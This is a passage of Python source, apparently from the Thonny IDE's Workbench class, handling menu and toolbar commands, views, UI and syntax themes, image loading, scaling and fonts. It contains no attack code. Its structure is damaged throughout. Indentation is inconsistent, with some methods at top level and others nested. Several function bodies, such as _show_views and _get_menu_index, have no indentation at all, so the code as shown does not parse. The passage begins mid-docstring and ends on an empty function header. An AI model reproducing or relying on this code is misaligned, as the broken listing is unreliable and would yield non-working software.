    command previously registered via add_command. See add_command for the
    meaning of the parameters."""

    def dispatch(event=None):
        # Gate invocation through the tester (when provided).
        if not tester or tester():
            denied = False
            handler()
        else:
            denied = True
            logging.debug("Command '" + command_id + "' execution denied")
            if bell_when_denied:
                self.bell()

        self.event_generate("UICommandDispatched", command_id=command_id, denied=denied)

    # The effective shortcut is user-configurable; default_sequence only
    # seeds the option.
    sequence_option_name = "shortcuts." + command_id
    self.set_default(sequence_option_name, default_sequence)
    sequence = self.get_option(sequence_option_name)

    if sequence:
        if not skip_sequence_binding:
            self.bind_all(sequence, dispatch, True)
        # register shortcut even without binding
        register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)

    for extra_sequence in extra_sequences:
        self.bind_all(extra_sequence, dispatch, True)
        if "greek_" not in extra_sequence.lower() or running_on_linux():
            # Use greek alternatives only on Linux
            # (they are not required on Mac
            # and cause double events on Windows)
            register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)

    menu = self.get_menu(menu_name)

    if image:
        _image = self.get_image(image)  # type: Optional[tk.PhotoImage]
        _disabled_image = self.get_image(image, disabled=True)
    else:
        _image = None
        _disabled_image = None

    if not accelerator and sequence:
        accelerator = sequence_to_accelerator(sequence)
    """
    # Does not work on Mac
    if show_extra_sequences:
        for extra_seq in extra_sequences:
            accelerator += " or " + sequence_to_accelerator(extra_seq)
    """

    if include_in_menu:

        def dispatch_from_menu():
            # I don't like that Tk menu toggles checkbutton variable
            # automatically before calling the handler.
            # So I revert the toggle before calling the actual handler.
            # This way the handler doesn't have to worry whether it
            # needs to toggle the variable or not, and it can choose to
            # decline the toggle.
            if flag_name is not None:
                var = self.get_variable(flag_name)
                var.set(not var.get())

            dispatch(None)

        if _image and lookup_style_option("OPTIONS", "icons_in_menus", True):
            menu_image = _image  # type: Optional[tk.PhotoImage]
        elif flag_name:
            # no image or blank image next to a checkbox
            menu_image = None
        else:
            menu_image = self.get_image("16x16-blank")

        # remember the details that can't be stored in Tkinter objects
        self._menu_item_specs[(menu_name, command_label)] = MenuItem(
            group, position_in_group, tester
        )

        menu.insert(
            self._find_location_for_menu_item(menu_name, command_label),
            "checkbutton" if flag_name else "cascade" if submenu else "command",
            label=command_label,
            accelerator=accelerator,
            image=menu_image,
            compound=tk.LEFT,
            variable=self.get_variable(flag_name) if flag_name else None,
            command=dispatch_from_menu if handler else None,
            menu=submenu,
        )

    if include_in_toolbar:
        toolbar_group = self._get_menu_index(menu) * 100 + group
        assert caption is not None
        self._add_toolbar_button(
            command_id,
            _image,
            _disabled_image,
            command_label,
            caption,
            caption if alternative_caption is None else alternative_caption,
            accelerator,
            handler,
            tester,
            toolbar_group,
        )
def add_view(
    self,
    cls: Type[tk.Widget],
    label: str,
    default_location: str,
    visible_by_default: bool = False,
    default_position_key: Optional[str] = None,
) -> None:
    """Adds item to "View" menu for showing/hiding given view.

    Args:
        cls: Class or constructor for view. Should be callable with single
            argument (the master of the view).
        label: Label of the view tab.
        default_location: Location descriptor. Can be "nw", "sw", "s", "se", "ne".
        visible_by_default: Initial value for the view's visibility option.
        default_position_key: Sort key for tab ordering; defaults to the label.

    Returns: None
    """
    view_id = cls.__name__
    # PEP 8: compare with None using "is", not "==" (was "== None")
    if default_position_key is None:
        default_position_key = label

    self.set_default("view." + view_id + ".visible", visible_by_default)
    self.set_default("view." + view_id + ".location", default_location)
    self.set_default("view." + view_id + ".position_key", default_position_key)

    if self.in_simple_mode():
        # In simple mode visibility is fixed by SIMPLE_MODE_VIEWS and is
        # deliberately not tied to the persisted option.
        visibility_flag = tk.BooleanVar(value=view_id in SIMPLE_MODE_VIEWS)
    else:
        visibility_flag = cast(tk.BooleanVar, self.get_variable("view." + view_id + ".visible"))

    self._view_records[view_id] = {
        "class": cls,
        "label": label,
        "location": self.get_option("view." + view_id + ".location"),
        "position_key": self.get_option("view." + view_id + ".position_key"),
        "visibility_flag": visibility_flag,
    }

    # handler for the View-menu checkbutton
    def toggle_view_visibility():
        if visibility_flag.get():
            self.hide_view(view_id)
        else:
            self.show_view(view_id, True)

    self.add_command(
        "toggle_" + view_id,
        menu_name="view",
        command_label=label,
        handler=toggle_view_visibility,
        flag_name="view." + view_id + ".visible",
        group=10,
        position_in_group="alphabetic",
    )
def add_configuration_page(
    self, key: str, title: str, page_class: Type[tk.Widget], order: int
) -> None:
    """Register a page to be shown in the options dialog."""
    page_spec = (key, title, page_class, order)
    self._configuration_pages.append(page_spec)
def add_content_inspector(self, inspector_class: Type) -> None:
    # Registers a content inspector class; consumers read
    # self.content_inspector_classes.
    self.content_inspector_classes.append(inspector_class)
def add_backend(
    self,
    name: str,
    proxy_class: Type[BackendProxy],
    description: str,
    config_page_constructor,
    sort_key=None,
) -> None:
    """Register a backend (interpreter kind) under given name."""
    if sort_key is None:
        sort_key = description

    self._backends[name] = BackendSpec(
        name, proxy_class, description, config_page_constructor, sort_key
    )

    # assign names to related classes
    proxy_class.backend_name = name  # type: ignore
    proxy_class.backend_description = description  # type: ignore
    if not getattr(config_page_constructor, "backend_name", None):
        config_page_constructor.backend_name = name
def add_ui_theme(
    self,
    name: str,
    parent: Union[str, None],
    settings: FlexibleUiThemeSettings,
    images: Optional[Dict[str, str]] = None,
) -> None:
    """Register a UI theme.

    Args:
        name: Theme name; overwriting an existing name emits a warning.
        parent: Name of the ancestor theme whose settings this one extends,
            or None for a root theme.
        settings: Theme settings (dict, sequence of dicts, or callable
            producing them -- resolved in _register_ui_theme_as_tk_theme).
        images: Optional image-name mapping for this theme.
    """
    if name in self._ui_themes:
        warn(tr("Overwriting theme '%s'") % name)

    # Use a None sentinel instead of a mutable {} default: the dict is stored
    # by reference, so a shared module-level default could leak mutations
    # between themes.
    self._ui_themes[name] = (parent, settings, {} if images is None else images)
def add_syntax_theme(
    self, name: str, parent: Optional[str], settings: FlexibleSyntaxThemeSettings
) -> None:
    """Register a syntax-highlighting theme under given name."""
    theme_entry = (parent, settings)
    if name in self._syntax_themes:
        warn(tr("Overwriting theme '%s'") % name)
    self._syntax_themes[name] = theme_entry
def get_usable_ui_theme_names(self) -> Sequence[str]:
    """Return names of UI themes that have a parent theme, sorted alphabetically."""
    usable = [
        theme_name
        for theme_name, (parent, _, _) in self._ui_themes.items()
        if parent is not None
    ]
    return sorted(usable)
def get_syntax_theme_names(self) -> Sequence[str]:
    """Return all registered syntax theme names in alphabetical order."""
    return sorted(self._syntax_themes)
def get_ui_mode(self) -> str:
    # Active UI mode; nearby code compares against "simple" and "expert"
    # (presumably "regular" is the third value -- confirm).
    return self._active_ui_mode
def in_simple_mode(self) -> bool:
    # Simple mode shows a reduced UI (see SIMPLE_MODE_VIEWS usage in add_view).
    return self.get_ui_mode() == "simple"
def scale(self, value: Union[int, float]) -> int:
    """Scale a logical dimension by the UI scaling factor, returning pixels.

    Truncates (int) instead of rounding so that thin lines stay one pixel
    even with factors like 1.67, but never collapses a positive size to zero.

    Raises:
        NotImplementedError: for non-numeric values.
    """
    if not isinstance(value, (int, float)):
        raise NotImplementedError("Only numeric dimensions supported at the moment")

    scaled = int(self._scaling_factor * value)
    if scaled == 0 and value > 0:
        # don't lose thin lines because of scaling
        return 1
    return scaled
def _register_ui_theme_as_tk_theme(self, name: str) -> None:
    """Flatten the named theme's ancestor chain into a single Tk theme and
    register its image mapping."""
    # collect settings from all ancestors
    total_settings = []  # type: List[FlexibleUiThemeSettings]
    total_images = {}  # type: Dict[str, str]
    temp_name = name
    while True:
        parent, settings, images = self._ui_themes[temp_name]
        total_settings.insert(0, settings)
        for img_name in images:
            # closer ancestors win (setdefault keeps the first/most-derived entry)
            total_images.setdefault(img_name, images[img_name])

        if parent is not None:
            temp_name = parent
        else:
            # reached start of the chain
            break

    assert temp_name in self._style.theme_names()
    # only root of the ancestors is relevant for theme_create,
    # because the method actually doesn't take parent settings into account
    # (https://mail.python.org/pipermail/tkinter-discuss/2015-August/003752.html)

    self._style.theme_create(name, temp_name)
    self._image_mapping_by_theme[name] = total_images

    # load images
    self.get_image("tab-close", "img_close")
    self.get_image("tab-close-active", "img_close_active")

    # apply settings starting from root ancestor
    for settings in total_settings:
        if callable(settings):
            settings = settings()

        if isinstance(settings, dict):
            self._style.theme_settings(name, settings)
        else:
            for subsettings in settings:
                self._style.theme_settings(name, subsettings)
def _apply_ui_theme(self, name: str) -> None:
    """Activate the named UI theme (registering it with Tk on first use) and
    propagate its colors to plain-Tk widgets and menus."""
    self._current_theme_name = name
    if name not in self._style.theme_names():
        self._register_ui_theme_as_tk_theme(name)

    self._style.theme_use(name)

    # https://wiki.tcl.tk/37973#pagetocfe8b22ab
    for setting in ["background", "foreground", "selectBackground", "selectForeground"]:
        value = self._style.lookup("Listbox", setting)
        if value:
            self.option_add("*TCombobox*Listbox." + setting, value)
            self.option_add("*Listbox." + setting, value)

    text_opts = self._style.configure("Text")
    if text_opts:
        for key in text_opts:
            self.option_add("*Text." + key, text_opts[key])

    if hasattr(self, "_menus"):
        # if menus have been initialized, ie. when theme is being changed
        for menu in self._menus.values():
            menu.configure(get_style_configuration("Menu"))

    self.update_fonts()
def _apply_syntax_theme(self, name: str) -> None:
    """Resolve the named syntax theme (recursively merging ancestor settings)
    and hand the result to codeview."""

    def get_settings(name):
        try:
            parent, settings = self._syntax_themes[name]
        except KeyError:
            self.report_exception("Can't find theme '%s'" % name)
            return {}

        if callable(settings):
            settings = settings()

        if parent is None:
            return settings
        else:
            result = get_settings(parent)
            # NOTE(review): update() mutates the dict objects that came from
            # the ancestor's stored settings -- presumably acceptable because
            # callable settings produce fresh dicts; confirm.
            for key in settings:
                if key in result:
                    result[key].update(settings[key])
                else:
                    result[key] = settings[key]

            return result

    from thonny import codeview

    codeview.set_syntax_options(get_settings(name))
def reload_themes(self) -> None:
    """Re-apply UI and syntax themes according to the current options,
    falling back to "Enhanced Clam" and then "Windows" when the preferred
    UI theme is unavailable."""
    available = self.get_usable_ui_theme_names()
    preferred = self.get_option("view.ui_theme")

    for candidate in (preferred, "Enhanced Clam", "Windows"):
        if candidate in available:
            self._apply_ui_theme(candidate)
            break

    self._apply_syntax_theme(self.get_option("view.syntax_theme"))
def uses_dark_ui_theme(self) -> bool:
    """True if the active theme or any of its ancestors has "dark" in its name."""
    name = self._style.theme_use()
    while True:
        if "dark" in name.lower():
            return True
        # NOTE(review): raises KeyError when the active Tk theme was never
        # registered via add_ui_theme -- looks like callers only invoke this
        # after reload_themes; confirm.
        name, _, _ = self._ui_themes[name]
        if name is None:
            # reached start of the chain
            break

    return False
def _init_program_arguments_frame(self) -> None:
    """Create the (initially hidden) toolbar frame for entering program
    arguments and the View-menu command for toggling it."""
    self.set_default("view.show_program_arguments", False)
    self.set_default("run.program_arguments", "")
    self.set_default("run.past_program_arguments", [])

    visibility_var = self.get_variable("view.show_program_arguments")
    content_var = self.get_variable("run.program_arguments")

    frame = ttk.Frame(self._toolbar)
    col = 1000
    self._toolbar.columnconfigure(col, weight=1)

    label = ttk.Label(frame, text=tr("Program arguments:"))
    label.grid(row=0, column=0, sticky="nse", padx=5)

    self.program_arguments_box = ttk.Combobox(
        frame,
        width=80,
        height=15,
        textvariable=content_var,
        values=[""] + self.get_option("run.past_program_arguments"),
    )
    self.program_arguments_box.grid(row=0, column=1, sticky="nsew", padx=5)
    frame.columnconfigure(1, weight=1)

    def update_visibility():
        # grid/grid_remove the frame according to the option value
        if visibility_var.get():
            if not frame.winfo_ismapped():
                frame.grid(row=0, column=col, sticky="nse")
        else:
            if frame.winfo_ismapped():
                frame.grid_remove()

    def toggle():
        visibility_var.set(not visibility_var.get())
        update_visibility()

    self.add_command(
        "viewargs",
        "view",
        tr("Program arguments"),
        toggle,
        flag_name="view.show_program_arguments",
        group=11,
    )

    update_visibility()
def _init_regular_mode_link(self):
    """In simple mode only: add a toolbar link for switching to regular mode
    (change takes effect after restart)."""
    if self.get_ui_mode() != "simple":
        return

    label = ttk.Label(
        self._toolbar,
        text=tr("Switch to\nregular\nmode"),
        justify="right",
        font="SmallLinkFont",
        style="Url.TLabel",
        cursor="hand2",
    )
    label.grid(row=0, column=1001, sticky="ne")

    def on_click(event):
        # persist the new mode and tell the user a restart is needed
        self.set_option("general.ui_mode", "regular")
        tk.messagebox.showinfo(
            tr("Regular mode"),
            tr(
                "Configuration has been updated. "
                + "Restart Thonny to start working in regular mode.\n\n"
                + "(See 'Tools → Options → General' if you change your mind later.)"
            ),
            master=self,
        )

    label.bind("<1>", on_click, True)
def _switch_backend_group(self, group):
    # No-op stub -- not implemented in this build.
    pass
def _switch_darkness(self, mode):
    # No-op stub -- not implemented in this build.
    pass
def _switch_to_regular_mode(self):
    # No-op stub -- not implemented in this build
    # (see _init_regular_mode_link for the actual switching UI).
    pass
def log_program_arguments_string(self, arg_str: str) -> None:
    """Store given argument string as the current one and push it to the
    front of the most-recently-used history (capped at 10 entries)."""
    cleaned = arg_str.strip()
    self.set_option("run.program_arguments", cleaned)

    if cleaned == "":
        # empty will be handled differently
        return

    history = self.get_option("run.past_program_arguments")
    if cleaned in history:
        history.remove(cleaned)
    history.insert(0, cleaned)
    history = history[:10]

    self.set_option("run.past_program_arguments", history)
    self.program_arguments_box.configure(values=[""] + history)
def _show_views(self) -> None:
for view_id in self._view_records:
if self._view_records[view_id]["visibility_flag"].get():
try:
self.show_view(view_id, False)
except Exception:
self.report_exception("Problem showing " + view_id)
def update_image_mapping(self, mapping: Dict[str, str]) -> None:
    """Was used by thonny-pi. Not recommended anymore"""
    # merges into the global (theme-independent) image-name mapping
    self._default_image_mapping.update(mapping)
def get_backends(self) -> Dict[str, BackendSpec]:
    """Return the registry of backends added via add_backend."""
    return self._backends
def get_option(self, name: str, default=None) -> Any:
    """Return the value of a configuration option (delegates to the
    configuration manager)."""
    # Need to return Any, otherwise each typed call site needs to cast
    return self._configuration_manager.get_option(name, default)
def set_option(self, name: str, value: Any) -> None:
    """Set a configuration option (delegates to the configuration manager)."""
    self._configuration_manager.set_option(name, value)
def get_local_cwd(self) -> str:
    """Return the configured local working directory, falling back to the
    user's home directory when the configured one no longer exists."""
    configured = self.get_option("run.working_directory")
    if not os.path.exists(configured):
        configured = os.path.expanduser("~")
    return normpath_with_actual_case(configured)
def set_local_cwd(self, value: str) -> None:
    """Store the local working directory option; on actual change with a
    non-empty value, notify listeners."""
    if self.get_option("run.working_directory") == value:
        return
    self.set_option("run.working_directory", value)
    if value:
        self.event_generate("LocalWorkingDirectoryChanged", cwd=value)
def set_default(self, name: str, default_value: Any) -> None:
    """Registers a new option (delegates to the configuration manager).

    If the name contains a period, then the part left to the (first) period
    will become the section of the option and rest will become name under that
    section.

    If the name doesn't contain a period, then it will be added under section
    "general".
    """
    self._configuration_manager.set_default(name, default_value)
def get_variable(self, name: str) -> tk.Variable:
    """Return the Tk variable for given option name (delegates to the
    configuration manager)."""
    return self._configuration_manager.get_variable(name)
def get_menu(self, name: str, label: Optional[str] = None) -> tk.Menu:
    """Gives the menu with given name. Creates if not created yet.

    Args:
        name: meant to be used as not translatable menu name
        label: translated label, used only when menu with given name doesn't exist yet
    """
    if name not in self._menus:
        if running_on_mac_os():
            conf = {}
        else:
            conf = get_style_configuration("Menu")

        menu = tk.Menu(self._menubar, **conf)
        menu["postcommand"] = lambda: self._update_menu(menu, name)
        self._menubar.add_cascade(label=label if label else name, menu=menu)

        self._menus[name] = menu
        if label:
            # register under the translated label too, so lookups by either key work
            self._menus[label] = menu

    return self._menus[name]
def get_view(self, view_id: str, create: bool = True) -> tk.Widget:
    """Return the instance of a registered view, creating it lazily on first
    access (unless create is False, in which case a missing instance raises
    RuntimeError)."""
    if "instance" not in self._view_records[view_id]:
        if not create:
            raise RuntimeError("View %s not created" % view_id)
        class_ = self._view_records[view_id]["class"]
        location = self._view_records[view_id]["location"]
        master = self._view_notebooks[location]

        # create the view
        view = class_(self)  # View's master is workbench to allow making it maximized
        view.position_key = self._view_records[view_id]["position_key"]
        self._view_records[view_id]["instance"] = view

        # create the view home_widget to be added into notebook
        view.home_widget = ttk.Frame(master)
        view.home_widget.columnconfigure(0, weight=1)
        view.home_widget.rowconfigure(0, weight=1)
        view.home_widget.maximizable_widget = view  # type: ignore
        view.home_widget.close = lambda: self.hide_view(view_id)  # type: ignore
        if hasattr(view, "position_key"):
            view.home_widget.position_key = view.position_key  # type: ignore

        # initially the view will be in its home_widget
        view.grid(row=0, column=0, sticky=tk.NSEW, in_=view.home_widget)
        view.hidden = True

    return self._view_records[view_id]["instance"]
def get_editor_notebook(self) -> EditorNotebook:
    # Created in _init_containers, so it must exist by the time clients ask.
    assert self._editor_notebook is not None
    return self._editor_notebook
def get_package_dir(self):
    """Returns thonny package directory"""
    thonny_module = sys.modules["thonny"]
    return os.path.dirname(thonny_module.__file__)
def get_image(
    self, filename: str, tk_name: Optional[str] = None, disabled=False
) -> Optional[tk.PhotoImage]:
    """Load an image, applying theme mapping, the "_disabled_" variant,
    platform-specific variant and 2x-scaling variant when present.

    Returns None when the disabled variant is requested but its file doesn't
    exist. References to created images are kept in self._images so Tk
    doesn't discard them.
    """
    # theme-specific mapping first, then the global default mapping
    if filename in self._image_mapping_by_theme[self._current_theme_name]:
        filename = self._image_mapping_by_theme[self._current_theme_name][filename]

    if filename in self._default_image_mapping:
        filename = self._default_image_mapping[filename]

    # if path is relative then interpret it as living in res folder
    if not os.path.isabs(filename):
        filename = os.path.join(self.get_package_dir(), "res", filename)
        if not os.path.exists(filename):
            # try the known extensions
            if os.path.exists(filename + ".png"):
                filename = filename + ".png"
            elif os.path.exists(filename + ".gif"):
                filename = filename + ".gif"

    if disabled:
        filename = os.path.join(
            os.path.dirname(filename), "_disabled_" + os.path.basename(filename)
        )
        if not os.path.exists(filename):
            return None

    # are there platform-specific variants?
    plat_filename = filename[:-4] + "_" + platform.system() + ".png"
    if os.path.exists(plat_filename):
        filename = plat_filename

    if self._scaling_factor >= 2.0:
        scaled_filename = filename[:-4] + "_2x.png"
        if os.path.exists(scaled_filename):
            filename = scaled_filename
        else:
            # no pre-scaled variant -- zoom the base image via Tcl
            img = tk.PhotoImage(file=filename)
            # can't use zoom method, because this doesn't allow name
            img2 = tk.PhotoImage(tk_name)
            self.tk.call(
                img2,
                "copy",
                img.name,
                "-zoom",
                int(self._scaling_factor),
                int(self._scaling_factor),
            )
            self._images.add(img2)
            return img2

    img = tk.PhotoImage(tk_name, file=filename)
    self._images.add(img)
    return img
def show_view(self, view_id: str, set_focus: bool = True) -> Union[bool, tk.Widget]:
    """Make a registered view visible and select its tab.

    Args:
        view_id: View class name without package name (eg. 'ShellView').
        set_focus: Whether to give keyboard focus to the view.

    Returns:
        The view widget, or False when the view's before_show hook vetoed.
    """
    if view_id == "MainFileBrowser":
        # Was renamed in 3.1.1
        view_id = "FilesView"

    # NB! Don't forget that view.home_widget is added to notebook, not view directly
    # get or create
    view = self.get_view(view_id)
    notebook = view.home_widget.master  # type: ignore

    # PEP 8: only an explicit False return is a veto ("is False", was "== False")
    if hasattr(view, "before_show") and view.before_show() is False:  # type: ignore
        return False

    if view.hidden:  # type: ignore
        notebook.insert(
            "auto", view.home_widget, text=self._view_records[view_id]["label"]  # type: ignore
        )
        view.hidden = False  # type: ignore
        if hasattr(view, "on_show"):  # type: ignore
            view.on_show()

    # switch to the tab
    notebook.select(view.home_widget)  # type: ignore

    # add focus
    if set_focus:
        view.focus_set()

    self.set_option("view." + view_id + ".visible", True)
    self.event_generate("ShowView", view=view, view_id=view_id)
    return view
def hide_view(self, view_id: str) -> Union[bool, None]:
    """Remove the view's tab from its notebook (if it was ever created).

    Returns False when the view's before_hide hook vetoed, True otherwise.
    """
    # NB! Don't forget that view.home_widget is added to notebook, not view directly
    if "instance" in self._view_records[view_id]:
        # TODO: handle the case, when view is maximized
        view = self._view_records[view_id]["instance"]
        if view.hidden:
            return True

        # PEP 8: only an explicit False return is a veto ("is False", was "== False")
        if hasattr(view, "before_hide") and view.before_hide() is False:
            return False

        view.home_widget.master.forget(view.home_widget)

        self.set_option("view." + view_id + ".visible", False)
        self.event_generate("HideView", view=view, view_id=view_id)
        view.hidden = True

    return True
def event_generate(self, sequence: str, event: Optional[Record] = None, **kwargs) -> None:
    """Uses custom event handling when sequence doesn't start with <.
    In this case arbitrary attributes can be added to the event.
    Otherwise forwards the call to Tk's event_generate"""
    # pylint: disable=arguments-differ
    if sequence.startswith("<"):
        assert event is None
        tk.Tk.event_generate(self, sequence, **kwargs)
    else:
        if sequence in self._event_handlers:
            if event is None:
                event = WorkbenchEvent(sequence, **kwargs)
            else:
                event.update(kwargs)

            # make a copy of handlers, so that event handler can remove itself
            # from the registry during iteration
            # (or new handlers can be added)
            for handler in sorted(self._event_handlers[sequence].copy(), key=str):
                try:
                    # Yes, I'm serious. Barfing a handler should not kill the whole process
                    handler(event)
                except Exception:
                    self.report_exception("Problem when handling '" + sequence + "'")

    if not self._closing:
        self._update_toolbar()
def bind(self, sequence: str, func: Callable, add: Optional[bool] = None) -> None:  # type: ignore
    """Uses custom event handling when sequence doesn't start with <.
    Otherwise forwards the call to Tk's bind.

    NB! Unlike Tk's bind, a falsy ``add`` replaces all existing handlers for
    the sequence -- hence the warning below."""
    # pylint: disable=signature-differs

    if not add:
        logging.warning(
            "Workbench.bind({}, ..., add={}) -- did you really want to replace existing bindings?".format(
                sequence, add
            )
        )

    if sequence.startswith("<"):
        tk.Tk.bind(self, sequence, func, add)
    else:
        if sequence not in self._event_handlers or not add:
            self._event_handlers[sequence] = set()

        self._event_handlers[sequence].add(func)
def unbind(self, sequence: str, func=None) -> None:
    """Counterpart of bind: removes a Tk binding or a custom event handler."""
    # pylint: disable=arguments-differ
    if sequence.startswith("<"):
        # real Tk sequence -- delegate to Tk
        tk.Tk.unbind(self, sequence, funcid=func)
        return

    try:
        self._event_handlers[sequence].remove(func)
    except Exception:
        logger.exception("Can't remove binding for '%s' and '%s'", sequence, func)
def in_heap_mode(self) -> bool:
    """True when the HeapView visibility option is registered and enabled."""
    # TODO: add a separate command for enabling the heap mode
    # untie the mode from HeapView
    if not self._configuration_manager.has_option("view.HeapView.visible"):
        return False
    return self.get_option("view.HeapView.visible")
def in_debug_mode(self) -> bool:
    """True when debug mode is requested via the THONNY_DEBUG environment
    variable or the general.debug_mode option."""
    env_value = os.environ.get("THONNY_DEBUG", False)
    if env_value in ("1", 1, "True", True, "true"):
        return True
    return self.get_option("general.debug_mode", False)
def _init_scaling(self) -> None:
    """Compute and apply the UI scaling factor ("tk scaling") and, on Linux
    and macOS with explicit scaling, adjust the named system fonts too."""
    self._default_scaling_factor = self.tk.call("tk", "scaling")
    if self._default_scaling_factor > 10:
        # it may be infinity in eg. Fedora
        self._default_scaling_factor = 1.33

    scaling = self.get_option("general.scaling")
    if scaling in ["default", "auto"]:  # auto was used in 2.2b3
        self._scaling_factor = self._default_scaling_factor
    else:
        self._scaling_factor = float(scaling)

    MAC_SCALING_MODIFIER = 1.7
    if running_on_mac_os():
        self._scaling_factor *= MAC_SCALING_MODIFIER

    self.tk.call("tk", "scaling", self._scaling_factor)

    font_scaling_mode = self.get_option("general.font_scaling_mode")

    if (
        running_on_linux()
        and font_scaling_mode in ["default", "extra"]
        and scaling not in ["default", "auto"]
    ):
        # update system fonts which are given in pixel sizes
        for name in tk_font.names():
            f = tk_font.nametofont(name)
            orig_size = f.cget("size")
            # According to the documentation, absolute values of negative font sizes
            # should be interpreted as pixel sizes (not affected by "tk scaling")
            # and positive values are point sizes, which are supposed to scale automatically
            # http://www.tcl.tk/man/tcl8.6/TkCmd/font.htm#M26
            # Unfortunately it seems that this cannot be relied on
            # https://groups.google.com/forum/#!msg/comp.lang.tcl/ZpL6tq77M4M/GXImiV2INRQJ
            # My experiments show that manually changing negative font sizes
            # doesn't have any effect -- fonts keep their default size
            # (Tested in Raspbian Stretch, Ubuntu 18.04 and Fedora 29)
            # On the other hand positive sizes scale well (and they don't scale automatically)

            # convert pixel sizes to point_size
            if orig_size < 0:
                orig_size = -orig_size / self._default_scaling_factor

            # scale
            scaled_size = round(
                orig_size * (self._scaling_factor / self._default_scaling_factor)
            )
            f.configure(size=scaled_size)

    elif running_on_mac_os() and scaling not in ["default", "auto"]:
        # see http://wiki.tcl.tk/44444
        # update system fonts
        for name in tk_font.names():
            f = tk_font.nametofont(name)
            orig_size = f.cget("size")
            assert orig_size > 0
            f.configure(size=int(orig_size * self._scaling_factor / MAC_SCALING_MODIFIER))
    def update_fonts(self) -> None:
        """Apply the current font options to all named Tk fonts.

        Re-reads editor/IO font family and size from options (clamped via
        _guard_font_size), reconfigures the IO, editor and (in simple mode)
        UI fonts, adjusts Treeview row height, and refreshes dependent views.
        """
        editor_font_size = self._guard_font_size(self.get_option("view.editor_font_size"))
        editor_font_family = self.get_option("view.editor_font_family")
        io_font_size = self._guard_font_size(self.get_option("view.io_font_size"))
        io_font_family = self.get_option("view.io_font_family")
        # All IO font variants share the same family and size
        for io_name in [
            "IOFont",
            "BoldIOFont",
            "UnderlineIOFont",
            "ItalicIOFont",
            "BoldItalicIOFont",
        ]:
            tk_font.nametofont(io_name).configure(family=io_font_family, size=io_font_size)
        try:
            shell = self.get_view("ShellView", create=False)
        except Exception:
            # shell may be not created yet
            pass
        else:
            shell.update_tabs()
        tk_font.nametofont("EditorFont").configure(family=editor_font_family, size=editor_font_size)
        tk_font.nametofont("SmallEditorFont").configure(
            family=editor_font_family, size=editor_font_size - 2
        )
        tk_font.nametofont("BoldEditorFont").configure(
            family=editor_font_family, size=editor_font_size
        )
        tk_font.nametofont("ItalicEditorFont").configure(
            family=editor_font_family, size=editor_font_size
        )
        tk_font.nametofont("BoldItalicEditorFont").configure(
            family=editor_font_family, size=editor_font_size
        )
        if self.get_ui_mode() == "simple":
            # In simple mode the general UI fonts track the editor font size,
            # scaled down (with a lower bound) so the UI stays compact
            default_size_factor = max(0.7, 1 - (editor_font_size - 10) / 25)
            small_size_factor = max(0.6, 0.8 - (editor_font_size - 10) / 25)
            tk_font.nametofont("TkDefaultFont").configure(
                size=round(editor_font_size * default_size_factor)
            )
            tk_font.nametofont("TkHeadingFont").configure(
                size=round(editor_font_size * default_size_factor)
            )
            tk_font.nametofont("SmallLinkFont").configure(
                size=round(editor_font_size * small_size_factor)
            )
        # Update Treeview font and row height
        if running_on_mac_os():
            treeview_font_size = int(editor_font_size * 0.7 + 4)
        else:
            treeview_font_size = int(editor_font_size * 0.7 + 2)
        treeview_font = tk_font.nametofont("TreeviewFont")
        treeview_font.configure(size=treeview_font_size)
        # row height must leave some air around the text line
        rowheight = round(treeview_font.metrics("linespace") * 1.2)
        style = ttk.Style()
        style.configure("Treeview", rowheight=rowheight)
        if self._editor_notebook is not None:
            self._editor_notebook.update_appearance()
def _get_menu_index(self, menu: tk.Menu) -> int:
for i in range(len(self._menubar.winfo_children())):
if menu == self._menubar.winfo_children()[i]:
return i
raise RuntimeError("Couldn't find menu")
    def _add_toolbar_button(
        self,
        command_id: str,
        image: Optional[tk.PhotoImage],
        disabled_image: Optional[tk.PhotoImage],
        command_label: str,
        caption: str,
        alternative_caption: str,
        accelerator: Optional[str],
        handler: Callable[[], None],
        tester: Optional[Callable[[], bool]],
        toolbar_group: int,
    ) -> None:
        """Create a toolbar button for a command and register it.

        The button is placed into the frame of *toolbar_group* (created on
        first use), wired to *handler*, given a tooltip (with accelerator
        when applicable), and stored in self._toolbar_buttons[command_id].
        """
        assert caption is not None and len(caption) > 0, (
            "Missing caption for '%s'. Toolbar commands must have caption." % command_label
        )
        slaves = self._toolbar.grid_slaves(0, toolbar_group)
        if len(slaves) == 0:
            # first button in this group -- create its container frame
            group_frame = ttk.Frame(self._toolbar)
            if self.in_simple_mode():
                padx = 0  # type: Union[int, Tuple[int, int]]
            else:
                padx = (0, 10)
            group_frame.grid(row=0, column=toolbar_group, padx=padx)
        else:
            group_frame = slaves[0]
        if self.in_simple_mode():
            # simple mode shows captions; width depends on screen size
            screen_width = self.winfo_screenwidth()
            if screen_width >= 1280:
                button_width = max(7, len(caption), len(alternative_caption))
            elif screen_width >= 1024:
                button_width = max(6, len(caption), len(alternative_caption))
            else:
                button_width = max(5, len(caption), len(alternative_caption))
        else:
            button_width = None
        if disabled_image is not None:
            # Tk state-dependent image spec: disabled state uses alternate image
            image_spec = [image, "disabled", disabled_image]
        else:
            image_spec = image
        button = ttk.Button(
            group_frame,
            image=image_spec,
            style="Toolbutton",
            state=tk.NORMAL,
            text=caption,
            compound="top" if self.in_simple_mode() else None,
            pad=(10, 0) if self.in_simple_mode() else None,
            width=button_width,
        )
        def toolbar_handler(*args):
            # run the command, then refresh enabled/disabled states
            handler(*args)
            self._update_toolbar()
            if self.focus_get() == button:
                # previously selected widget would be better candidate, but this is
                # better than button
                self._editor_notebook.focus_set()
        button.configure(command=toolbar_handler)
        button.pack(side=tk.LEFT)
        button.tester = tester  # type: ignore
        tooltip_text = command_label
        if self.get_ui_mode() != "simple":
            if accelerator and lookup_style_option(
                "OPTIONS", "shortcuts_in_tooltips", default=True
            ):
                tooltip_text += " (" + accelerator + ")"
        create_tooltip(button, tooltip_text)
        self._toolbar_buttons[command_id] = button
def get_toolbar_button(self, command_id):
return self._toolbar_buttons[command_id]
    def _update_toolbar(self) -> None:
        """Enable/disable every visible toolbar button via its tester callback."""
        if self._destroyed or not hasattr(self, "_toolbar"):
            return
        if self._toolbar.winfo_ismapped():
            for group_frame in self._toolbar.grid_slaves(0):
                for button in group_frame.pack_slaves():
                    # Disabled when there is no runner yet, or the button's
                    # tester vetoes it. Note precedence: `or` binds looser
                    # than `and`, i.e. runner-is-None alone disables.
                    if thonny._runner is None or button.tester and not button.tester():
                        button["state"] = tk.DISABLED
                    else:
                        button["state"] = tk.NORMAL
def _cmd_zoom_with_mouse(self, event) -> None:
